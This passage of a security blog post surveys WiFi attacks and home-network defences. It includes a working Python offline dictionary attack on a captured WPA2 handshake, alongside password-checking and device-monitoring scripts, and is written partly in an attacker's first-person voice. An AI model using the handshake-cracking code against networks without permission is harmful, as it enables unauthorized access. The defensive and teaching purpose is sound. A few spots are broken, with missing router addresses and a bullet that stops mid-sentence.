as well. Read on to learn about the methods that hackers use to steal data and what you can do to
keep them out.

In a wired network, packets of information are transferred along a physical medium, such as a
copper cable or fiber optics. In a wireless setup, your data is quite literally broadcast through the
air around you. Furthermore, physical access is not required to gain access to a network. What this
means is that cyber criminals now have new ways to wreak havoc on your network infrastructure.
Let’s take a look at these wireless attacks.


Wireless Attacks can come at you through different methods. For the most part you need to worry
about WiFi. Some methods rely on tricking users, others use brute force, and some look for people
who don’t bother to secure their network. Many of these attacks are intertwined with each other
in real world use. Here are some of the kinds of attacks you could encounter:

• Packet Sniffing: When information is sent back and forth over a network, it is sent in what we
call packets. Since wireless traffic is sent over the air, it’s very easy to capture. Quite a lot of
traffic (FTP, HTTP, SNMP, etc.) is sent in the clear, meaning that there is no encryption and
files are in plain text for anyone to read. So using a tool like Wireshark allows you to read data
transfers in plain text! This can lead to stolen passwords or leaks of sensitive information quite
easily. Encrypted data can be captured as well, but it’s obviously much harder for an attacker
to decipher the encrypted data packets.
• Rogue Access Point: When an unauthorized access point (AP) appears on a network, it is referred to as a rogue access point. These can pop up from an employee who doesn't know better, or from a person with ill intent. These APs represent a vulnerability to the network because they leave it open to a variety of attacks. These include vulnerability scans for attack preparation, ARP poisoning, packet captures, and Denial of Service attacks.
• Password Theft: When communicating over wireless networks, think of how often you log
into a website. You send passwords out over the network, and if the site doesn’t use SSL or
TLS, that password is sitting in plain text for an attacker to read. There are even ways to get
around those encryption methods to steal the password. I’ll talk about this with man in the
middle attacks.
• Man in the Middle Attack: It’s possible for hackers to trick communicating devices into
sending their transmissions to the attacker’s system. Here they can record the traffic to view
later (like in packet sniffing) and even change the contents of files. Various types of malware
can be inserted into these packets, e-mail content could be changed, or the traffic could be
dropped so that communication is blocked.
• Jamming: There are a number of ways to jam a wireless network. One method is flooding clients with spoofed de-authentication frames, which forces them to drop their association with the AP over and over and prevents legitimate transmissions from getting through (802.11 management frames were unauthenticated before 802.11w Protected Management Frames). This attack is a little unusual because there probably isn't anything in it for the hacker, apart from using it as a step in another attack such as forcing clients to reconnect so a WPA handshake can be captured. One of the few examples of how this could benefit someone is through a business jamming their competitor's WiFi signal. This is highly illegal (as are all these attacks), so businesses would tend to shy away from it. If they got caught they would be facing serious charges.
• War Driving: War driving comes from an old term called war dialling, where people would dial
random phone numbers in search of modems. War driving is basically people driving around
looking for vulnerable APs to attack. People will even use drones to try and hack APs on higher
floors of a building. A company that owns multiple floors around ten stories up might assume
nobody is even in range to hack their wireless, but there is no end to the creativity of hackers!
• Bluetooth Attacks: There are a variety of Bluetooth exploits out there. These range from
annoying pop up messages, to full control over the a victims Bluetooth enabled device. Check
out this blog post on hacking Bluetooth for an in depth look.
• WEP/WPA Attacks: Attacks on wireless routers can be a huge problem. Older encryption
standards are extremely vulnerable, and it’s pretty easy to gain the access code in this case.
Once someone's on your network, you’ve lost a significant layer of security. APs and routers
are hiding your IP address from the broader Internet using Network Address
Translation(unless you use IPv6 but that’s a topic for another day). This effectively hides your
private IP address from those outside your subnet, and helps prevent outsiders from being
able to directly attack you. The keyword there is that it helps prevent the attacks, but doesn’t
stop it completely.
Another thing to take note of, is that our mobile devices are at risk whenever they connect to
public WiFi. Whether you use a phone, tablet, or laptop; accessing an insecure network is putting a
target on your data. Understand the risks or consider using a VPN.

If you are in an area where other businesses or homes are in close proximity, you could encounter
attempts of an attacker trying to steal WiFi credentials and gain access. This can be problematic on
many levels, as a hacker might not stop at using your internet for free. Once inside your subnet,
any connected device is vulnerable. This can get especially troublesome if you happen to have
security cameras in your house that are connected to your wireless network. This kind of attack
often happens with WEP encryption, as it is much easier to crack than WPA/WPA2. Of course, a
determined hacker can likely find a way in regardless of what encryption you use

WPA/WPA2 are far more secure than WEP, but if you have WPS enabled I can gain access pretty quickly with a tool like Reaver. And even if you have followed the guidelines above, there's still a chance I can get into your wireless network.
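How "there's still a chance I can get in" plays out against WPA/WPA2 with a weak passphrase: an offline dictionary attack on a captured 4-way handshake, as an added Python example (not from the article and not a real capture; the SSID, MAC addresses, nonces, EAPOL frame and word list are constructed). The key derivation follows the 802.11 standard: PMK from PBKDF2-HMAC-SHA1 over the passphrase and SSID, PTK from the PRF over the MAC addresses and nonces, and the MIC of message 2 from HMAC-SHA1 under the first 16 bytes of the PTK. The attacker needs nothing from the AP after the capture, so no lockout or rate limit applies.

```python
import hashlib
import hmac

# Constructed handshake material for the example (not a real capture).
SSID = b"HomeNet"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
# EAPOL-Key message 2 as captured, with its 16-byte MIC field already zero-filled.
EAPOL_M2 = b"\x01\x03\x00\x75\x02\x01\x0a\x00" + bytes(114)


def pmk_from_passphrase(passphrase, ssid):
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def prf512(key, label, data):
    """IEEE 802.11 PRF-512 built from HMAC-SHA1: HMAC(K, label||0x00||data||i) for i = 0..3.
    PRF-384 (CCMP) is the 48-byte prefix of the same output, so the KCK is identical."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PTK = PRF(PMK, "Pairwise key expansion", min(MACs)||max(MACs)||min(nonces)||max(nonces))."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(ptk, eapol_frame_zeroed_mic):
    """WPA2 (AKM 00-0F-AC:2): MIC = HMAC-SHA1 over the EAPOL frame under the KCK
    (first 16 bytes of the PTK), truncated to 16 bytes."""
    kck = ptk[:16]
    return hmac.new(kck, eapol_frame_zeroed_mic, hashlib.sha1).digest()[:16]


def captured_mic_for(passphrase):
    """The MIC the client sent in message 2, given the real passphrase.  In an attack this
    value is read from the capture; here it is computed from the constructed data."""
    ptk = ptk_from_pmk(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    return eapol_mic(ptk, EAPOL_M2)


def crack_handshake(wordlist, captured_mic):
    """Offline dictionary attack: derive the keys for each candidate and compare MICs.
    Nothing is sent to the AP, so only the 4096 PBKDF2 rounds per guess slow the attacker."""
    for cand in wordlist:
        ptk = ptk_from_pmk(pmk_from_passphrase(cand, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
        if hmac.compare_digest(eapol_mic(ptk, EAPOL_M2), captured_mic):
            return cand
    return None


# Constructed word list for the example.
WORDLIST = ["password", "letmein", "sunshine", "sunshine1", "HomeNet2023", "iloveyou"]
```

Only the passphrase and the SSID go into the PMK, so the defence is a long random passphrase (and an unusual SSID, since precomputed PMK tables are per-SSID); WPS stays off regardless, because it bypasses the passphrase entirely.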

Warning: Because the following contains information that could be used for illegal purposes, I want
to really drill this into your head: hacking a network you do not own or have permission to attack
is multiple felonies! This information is for educational purposes, particularly for aspiring cyber
security professionals. If you are convicted of a felony you can be put in prison and fined heavily, you
lose your right to vote, you cannot legally own a firearm, and you have to disclose your status as a
convicted felon to future employers.
If you don’t have a place to practice legally, find one or make your own. Save up some cash and
build a test lab inside your home. It doesn’t need to be expensive. If you happen to be in the
Columbia MD area, I can refer you to Howard Community College’s cyber defence lab. You may
need to register as a student to use the facility though.

With that legal disclaimer in mind, let’s look at some of the techniques used to crack wireless
router passwords.

Hacking WEP, WPS, and WPA/WPA2

WEP: If I’m honest, if you have WEP encryption you may as well name your SSID “Free WiFi” and
disable the password. All I have to do is set my laptop’s wireless card to monitor mode (not all
wireless cards are capable of this) and see what APs are around. From here I focus on the one I
want to hack and start capturing packets and storing them in a file. If you happen to have WEP on
your wireless setup (I hope not!) or you have an old wireless router lying around that you can
set up to practice on, check out this tutorial for hacking WEP.

After around 10,000 packets (this doesn’t take as long as you may think) I take a shot at using a
tool to crack it. If it doesn’t work I wait until I have more packets and try again. In a fairly short
period of time I have a password in front of me, and access to your router. The only defense against
this attack is to upgrade to WPA/WPA2 (preferably WPA2).

WPS: This takes a few more steps. If WPS is enabled on your WPA2 router it’s almost as vulnerable
as one using WEP! This article on Ars Technica will give you an in-depth look at hacking WPS. If you
own a router with WPS enabled see if you can follow along. To defend yourself from this, turn off
WPS on your wireless router.

WPA/WPA2: These are far more secure than WEP so long as WPS is turned off. Of course, there is
still a way in. If you have a weak password, I can perform a brute force attack with a password file.
Essentially, there are massive lists of already cracked passwords, words from the dictionary, default
credentials, and common password variations available on the internet. In fact, Kali Linux has one
built in. Of course, this method requires time, or some serious computing power. The more
complex your password is, the longer this process takes. Essentially what you want to do is delay a
hacker for so long that they get bored and give up.

There is another WPA2 exploit. When a router is deauthenticating and forcing a device offline to
reauthenticate with a new key, there is a short opening that can be exploited. You could configure
your access point to use MAC filtering to stop this, but if the attacker is skilled enough to perform
this they will easily spoof your MAC address.


Now that you don’t trust anything on the Internet anymore, let’s build that confidence back up.
There are a lot of ways to make yourself less susceptible to wireless attacks.

• Use WPA2 security: This takes enough work to crack that most hackers will look for an easier
target. Make sure WPS is turned off!
• Minimize Your Network’s Reach: Try to position your router in the center of your home or
building. There are tools available to measure the reach of your network, and you can adjust
the signal level. Try to make it so that the signal beyond your walls is degraded enough that it
isn’t usable. You may also consider using a directional antenna if central placement is not an
• Use Firewalls: Make sure your AP’s firewall is enabled. If you can afford a hardware firewall and
feel you need the extra security, go ahead and install one. Household networks generally can
get away with the standard router firewall and operating system firewalls.
• Use a VPN on Open Networks: If you really must use public WiFi, set up a VPN. Most
smartphones have this capability. You can set one up on your PC. This allows you to
communicate through an encrypted tunnel back to your home or office. You can even send
web traffic through a VPN.
• Update Software and Firmware: Keep your system up to date with the latest patches, and
make sure any online applications you use are updated as well. Check for AP firmware
updates related to security flaws, and implement them as soon as possible. Remember to
follow best practices for network modification to ensure you don’t interrupt a critical task.
Check out your updates in a test lab to make sure that they don’t interfere with an important
application. Don’t perform updates during normal operating hours if possible, and if you must
update during work hours make sure everyone is aware that network connectivity could slow
down, or be cut off temporarily while you work.
• Use Strong Passwords: I recommend you use at least a 15 character password. Use a mix of
upper/lowercase letters, numbers, and symbols. Again, don’t make it easy. Is the only capital
letter at the start? Is there an exclamation at the end? Are there any words in there? These
are common bad password practices, and hackers love them.
• Change the Login Credentials: Make sure you change the administrative login credentials. This
is often something like admin/admin or admin/password by default.
• Disable your SSID (service set identifier) Broadcast: This isn’t a security measure. The right tools
will still find your network’s SSID (this is the name of your network in case you didn’t know).
However, there’s a small chance it could help your network fly under the radar.
• Enable MAC Filtering: Again, MAC filtering is not security. A knowledgeable hacker knows how
to monitor your network and copy the MAC address of a connected device. They can then
spoof their own MAC to appear as an authorized device to gain access. However, this is
another annoyance for them to deal with.
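The "Use Strong Passwords" item above lists concrete bad habits: too short, a single capital at the start, a lone exclamation mark at the end, and dictionary words. The checker below (added example, not code from the original post) turns that checklist into a pre-shared-key audit you can run before committing a new WPA2 passphrase; the word list is a tiny constructed placeholder, not the full lists the post mentions.

```python
import string

# Constructed stand-in for a dictionary / cracked-password list (placeholder only).
COMMON_WORDS = {"password", "summer", "welcome", "dragon", "monkey", "football",
                "qwerty", "letmein", "admin", "wifi", "router"}

# Reverse the usual "leet" substitutions so p@ssw0rd is caught as "password".
_LEET = str.maketrans("4301$@", "aeolsa")


def password_findings(pw):
    """Return the weaknesses from the post's checklist that are present in pw.

    An empty list means the passphrase cleared every check here; it does not
    prove the passphrase is strong, only that it avoids the listed bad habits.
    """
    findings = []
    if len(pw) < 15:
        findings.append("shorter than 15 characters")

    has_lower = any(c.islower() for c in pw)
    has_upper = any(c.isupper() for c in pw)
    has_digit = any(c.isdigit() for c in pw)
    has_symbol = any(c in string.punctuation for c in pw)
    if not (has_lower and has_upper and has_digit and has_symbol):
        findings.append("missing one or more of upper/lower/digit/symbol")

    # "Is the only capital letter at the start?"
    upper_positions = [i for i, c in enumerate(pw) if c.isupper()]
    if upper_positions == [0]:
        findings.append("only capital letter is the first character")

    # "Is there an exclamation at the end?" (and no other symbol anywhere)
    symbol_positions = [i for i, c in enumerate(pw) if c in string.punctuation]
    if pw and symbol_positions == [len(pw) - 1] and pw[-1] == "!":
        findings.append("only symbol is a trailing exclamation mark")

    # "Are there any words in there?" - compare after undoing leet-speak.
    normalized = pw.lower().translate(_LEET)
    for word in sorted(COMMON_WORDS):
        if word in normalized:
            findings.append(f"contains dictionary word '{word}'")
            break
    return findings


if __name__ == "__main__":
    for candidate in ("Summer2024!", "P@ssw0rd2023XYZab", "Tq7#mbL2!vz9Rk$p"):
        print(candidate, "->", password_findings(candidate) or "no findings")
```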
It’s a good idea to monitor your network connections to look for unusual activity. If you have an
Android phone you can use this free network IP scanner to see the IP addresses of connected
devices. Desktops can use something like the nmap tool. For a home network with few devices, you
want to find out what your devices’ IP addresses currently are, and see if there are any that don’t
match. Be aware that if your Wi-Fi uses DHCP (automatically assigned IPs) these could change
over time.

Note that your router has an IP as well, most likely it will be either or but it
may vary according to your setup.
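Because DHCP can hand a device a different address tomorrow, the comparison the post suggests works better when keyed on MAC address rather than IP. The script below (an added example, not part of the original post) parses the neighbour table a Linux host prints with `ip neigh`, compares it against an inventory of your own devices, and reports anything not on the list; the table lines and MACs are constructed sample data.

```python
import re

# Constructed sample of `ip neigh` output on a home WLAN (not a real capture).
SAMPLE_NEIGH = """\
192.168.1.1 dev wlan0 lladdr 52:54:00:aa:00:01 REACHABLE
192.168.1.23 dev wlan0 lladdr 52:54:00:aa:00:02 STALE
192.168.1.47 dev wlan0 lladdr 52:54:00:aa:00:03 REACHABLE
192.168.1.88 dev wlan0 lladdr 52:54:00:aa:00:09 REACHABLE
192.168.1.5 dev wlan0  FAILED
"""

# Inventory of devices you own, keyed by MAC because DHCP leases change the IP.
# The router's own entry is included so the gateway is not reported as unknown.
KNOWN_DEVICES = {
    "52:54:00:aa:00:01": "router (gateway)",
    "52:54:00:aa:00:02": "laptop",
    "52:54:00:aa:00:03": "phone",
}

# Only entries that carry a link-layer address (lladdr) identify a live device.
NEIGH_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3}) dev \S+ lladdr ([0-9a-fA-F:]{17})")


def parse_neigh(text):
    """Return {mac: ip} for every neighbour-table line that includes a MAC."""
    seen = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:
            ip, mac = m.group(1), m.group(2).lower()
            seen[mac] = ip
    return seen


def unknown_devices(text, known=KNOWN_DEVICES):
    """List (mac, ip) pairs present on the LAN but absent from the inventory."""
    return sorted((mac, ip) for mac, ip in parse_neigh(text).items() if mac not in known)


def report(text, known=KNOWN_DEVICES):
    """Human-readable summary: every known device seen, then any strangers."""
    seen = parse_neigh(text)
    lines = [f"{seen[mac]:<15} {mac}  {name}" for mac, name in known.items() if mac in seen]
    lines += [f"{ip:<15} {mac}  UNKNOWN DEVICE" for mac, ip in unknown_devices(text, known)]
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(SAMPLE_NEIGH))
```

The neighbour table only lists hosts this machine has recently exchanged traffic with, so run a ping sweep such as `nmap -sn` against your subnet first to populate it.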

There are a lot of ways for hackers to come after your data, but taking these simple precautionary
measures, and proactively monitoring for threats can make a world of difference.